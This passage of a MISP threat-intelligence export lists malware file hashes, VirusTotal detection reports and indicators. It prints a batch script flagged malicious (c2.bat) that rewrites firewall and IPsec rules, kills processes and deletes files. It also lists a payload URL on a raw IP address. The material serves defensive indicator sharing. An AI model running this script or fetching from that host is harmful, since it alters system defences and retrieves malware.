|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859151",
|
|
"uuid": "4a5526a0-66ef-4a36-859c-9fae1cf3a73e",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "20fed181-b496-436f-bd07-e34870c1a396",
|
|
"value": "2019-01-14T04:05:17"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "07e4489f-94f7-493f-aa56-c6f95cab3002",
|
|
"value": "https://www.virustotal.com/file/b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3/analysis/1547438717/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "b0f1138a-a269-414a-8e73-27d688dac9b2",
|
|
"value": "23/56"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859151",
|
|
"uuid": "5f4ce8ec-cff2-422d-977a-34ef4867b8f6",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "5f4ce8ec-cff2-422d-977a-34ef4867b8f6",
|
|
"referenced_uuid": "ab17e198-674e-4648-8c02-f3c1fcb73d3f",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859153",
|
|
"uuid": "5cea4d91-34f8-4ad2-98d2-4630950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "d1878ddd-4eb6-4dd5-b4fd-5ff37b078154",
|
|
"value": "e1fa5e03ddfe7c81f3f80d88a7162b5f"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "1f71a17c-3ea8-4fa9-a574-31c3d117b724",
|
|
"value": "72bb026e618e317eb231417b573a38d805c7bb00"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "1a3bf3bb-2e62-4896-be9e-2856ed877df9",
|
|
"value": "6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859151",
|
|
"uuid": "ab17e198-674e-4648-8c02-f3c1fcb73d3f",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "9527b674-741a-4d37-8e0d-5491ca6e906f",
|
|
"value": "2018-11-08T08:34:45"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "3349c61c-757c-4fac-99a6-8ad73aabc00a",
|
|
"value": "https://www.virustotal.com/file/6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae/analysis/1541666085/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "38f5c57b-bb70-4651-91f8-6ee1011f0a12",
|
|
"value": "1/57"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859151",
|
|
"uuid": "7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c",
|
|
"referenced_uuid": "e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859153",
|
|
"uuid": "5cea4d91-5658-4cc5-8a78-4223950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "74bcc5a1-dba2-4afe-9a6e-619e6e2abe96",
|
|
"value": "d515a6b5638ec213be9bd4fe507e0b6b"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "9302e0b0-0734-4759-80d2-d7b439fbffdf",
|
|
"value": "014ebb8391edb3fda76789e957ba973b3d97859c"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "6f9082f8-7e8a-4d5e-bf30-e21487581856",
|
|
"value": "65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859152",
|
|
"uuid": "e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "d7da733f-47f6-47be-adea-480154741de8",
|
|
"value": "2019-03-11T02:04:00"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "d4dc25cf-fedd-4a44-8065-323f4d48453b",
|
|
"value": "https://www.virustotal.com/file/65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c/analysis/1552269840/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "1ef30cb7-cba8-43dd-8c9a-544007af1d3a",
|
|
"value": "18/56"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859152",
|
|
"uuid": "94b76905-bc8e-4167-9633-b19262f34af8",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "94b76905-bc8e-4167-9633-b19262f34af8",
|
|
"referenced_uuid": "5c2ed803-b879-4d3c-9d36-583c1fde2562",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859153",
|
|
"uuid": "5cea4d91-6b18-4983-8e3c-470a950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "eca2ee42-6fdd-4237-a0db-5d505c6d8042",
|
|
"value": "6d8960cd6c9ba68a69af812fc1c4741b"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "d8b959ac-0182-4392-a031-279a5168e070",
|
|
"value": "b59ec01ab58a1fbf49846ad34d0b48445aad3506"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "469d4b67-a46f-411c-bd8f-e4fcba853ffc",
|
|
"value": "968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859152",
|
|
"uuid": "5c2ed803-b879-4d3c-9d36-583c1fde2562",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "4fbf8beb-ae11-4650-b5b7-8d185b468fe7",
|
|
"value": "2018-08-30T19:41:06"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "7d74e6cc-9eee-45bf-8eb4-43ef84cfe88d",
|
|
"value": "https://www.virustotal.com/file/968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02/analysis/1535658066/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "83006497-ca2b-4cac-8a39-68999f6b8ed8",
|
|
"value": "11/57"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859152",
|
|
"uuid": "3751d8a9-13b3-4049-82ec-9607df7fc404",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "3751d8a9-13b3-4049-82ec-9607df7fc404",
|
|
"referenced_uuid": "ecfc06ea-0951-451d-8b9a-4aeae8c7f133",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859153",
|
|
"uuid": "5cea4d91-ca10-4d9b-96ab-4828950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "bcdcdb86-c422-444c-952b-6c603f7ee0d7",
|
|
"value": "0383c324c0c99f930c65d4034c22766b"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "d5bcdcc8-d76c-43f5-80da-02592d947712",
|
|
"value": "a36f5113c764f60d9f48e7f9f7b779007f34bbc0"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "8fab5037-f23f-4b27-a0a3-de128ad93ef4",
|
|
"value": "58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859152",
|
|
"uuid": "ecfc06ea-0951-451d-8b9a-4aeae8c7f133",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "fc3f86ce-b03b-4b8e-94cd-66ce90d55ef4",
|
|
"value": "2018-09-22T00:26:43"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "c1d11cf9-2265-4824-bd54-a19ffaebc658",
|
|
"value": "https://www.virustotal.com/file/58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da/analysis/1537576003/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "f137b164-8fed-4b75-a650-b39d099da3a7",
|
|
"value": "19/59"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
|
|
"meta-category": "misc",
|
|
"name": "script",
|
|
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
|
|
"template_version": "3",
|
|
"timestamp": "1558859269",
|
|
"uuid": "5cea4e05-04c4-4f5f-ba43-4d3f950d210f",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "script",
|
|
"timestamp": "1558859270",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5cea4e06-1154-402d-999e-4397950d210f",
|
|
"value": "sc config MpsSvc start= auto&net start MpsSvc\r\nnetsh advfirewall set allprofiles state on\r\nnetsh advfirewall firewall add rule name=\"tcp all\" dir=in protocol=tcp localport=0-65535 action=allow\r\nnetsh advfirewall firewall add rule name=\"deny tcp 445\" dir=in protocol=tcp localport=445 action=block\r\nnetsh advfirewall firewall add rule name=\"deny tcp 139\" dir=in protocol=tcp localport=139 action=block\r\nnetsh advfirewall firewall add rule name=\"tcpall\" dir=out protocol=tcp localport=0-65535 action=allow \r\nnetsh ipsec static add policy name=win\r\nnetsh ipsec static add filterlist name=Allowlist\r\nnetsh ipsec static add filterlist name=denylist\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445\r\nnetsh ipsec static add filteraction name=Allow action=permit\r\nnetsh ipsec static add filteraction name=deny action=block\r\nnetsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny\r\nnetsh ipsec static set policy name=win assign=y \r\nver | find \"5.1.\" > NUL && sc config SharedAccess start= auto && echo Yes | reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\NetBT\\Parameters /t REG_DWORD /v SMBDeviceEnabled /d 0\r\nattrib -s -h -r %WINDIR%\\systxm1\\*.*&attrib -s -h -r %WINDIR%\\system\\*.*\r\n@Wmic Process Where \"Name='winlogon.exe' And ExecutablePath='%WINDIR%\\system\\winlogon.exe'\" Call Terminate &del %WINDIR%\\system\\winlogon.exe\r\n@Wmic Process Where \"Name='svchost.exe' And ExecutablePath='%WINDIR%\\system\\svchost.exe'\" Call Terminate &del %WINDIR%\\system\\svchost.exe\r\ndel %WINDIR%\\debug\\c2.bat\r\nexit"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "language",
|
|
"timestamp": "1558859270",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5cea4e06-73b0-4d56-9735-4443950d210f",
|
|
"value": "Winbatch"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1558859270",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "5cea4e06-d2c8-4d69-9615-494c950d210f",
|
|
"value": "c2.bat"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "state",
|
|
"timestamp": "1558859270",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5cea4e06-6794-4f57-9f62-4db6950d210f",
|
|
"value": "Malicious"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
|
"meta-category": "network",
|
|
"name": "url",
|
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
|
"template_version": "7",
|
|
"timestamp": "1558859411",
|
|
"uuid": "5cea4e93-8834-4dd5-992d-4763950d210f",
|
|
"Attribute": [
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "url",
|
|
"timestamp": "1558859411",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5cea4e93-48f4-4deb-9250-4716950d210f",
|
|
"value": "http://74.222.1.38:8888/close.bat"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "host",
|
|
"timestamp": "1558859411",
|
|
"to_ids": true,
|
|
"type": "hostname",
|
|
"uuid": "5cea4e93-49a4-4c43-bd35-46bf950d210f",
|
|
"value": "74.222.1.38"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "port",
|
|
"timestamp": "1558859411",
|
|
"to_ids": false,
|
|
"type": "port",
|
|
"uuid": "5cea4e93-43c8-4df8-b1f8-479a950d210f",
|
|
"value": "8888"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "resource_path",
|
|
"timestamp": "1558859411",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5cea4e93-5d3c-4230-9493-4b87950d210f",
|
|
"value": "close.bat"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859752",
|
|
"uuid": "195d072c-cab6-4370-b8ea-cf509e00959b",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "195d072c-cab6-4370-b8ea-cf509e00959b",
|
|
"referenced_uuid": "e0949b09-cf58-44f5-9455-d6253e56a131",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859753",
|
|
"uuid": "5cea4fe9-7828-44f7-9e41-4071950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859694",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "1b0c47b2-15b3-4593-ae65-9734cb1df50e",
|
|
"value": "4d437b5614edcc7d1ee5e4bcf5785ef9"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859694",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "881abb7f-80fe-4e58-9656-8101a2456e97",
|
|
"value": "995bc00abbcde848148c5695c10e38ae6b5a9401"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859694",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "ca8a295c-0a12-466d-9cbb-fd5bc3bb5b64",
|
|
"value": "43b4e78dcc1874dc1422b4dc4d40a4841163891a69d59d7f5a0289616fc83bb5"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859752",
|
|
"uuid": "e0949b09-cf58-44f5-9455-d6253e56a131",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859694",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "1ad77ee7-7031-4210-9b8a-2a44aae36573",
|
|
"value": "2019-05-11T06:46:25"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859694",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "cb5a7bf2-2d0d-49c2-9d5f-c050da740604",
|
|
"value": "https://www.virustotal.com/file/43b4e78dcc1874dc1422b4dc4d40a4841163891a69d59d7f5a0289616fc83bb5/analysis/1557557185/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859694",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "e8efebe6-f034-423e-9f89-70ee1b0dcb78",
|
|
"value": "5/59"
|
|
}
|
|
]
|
|
}
|
|
]
|
|
}
|
|
} |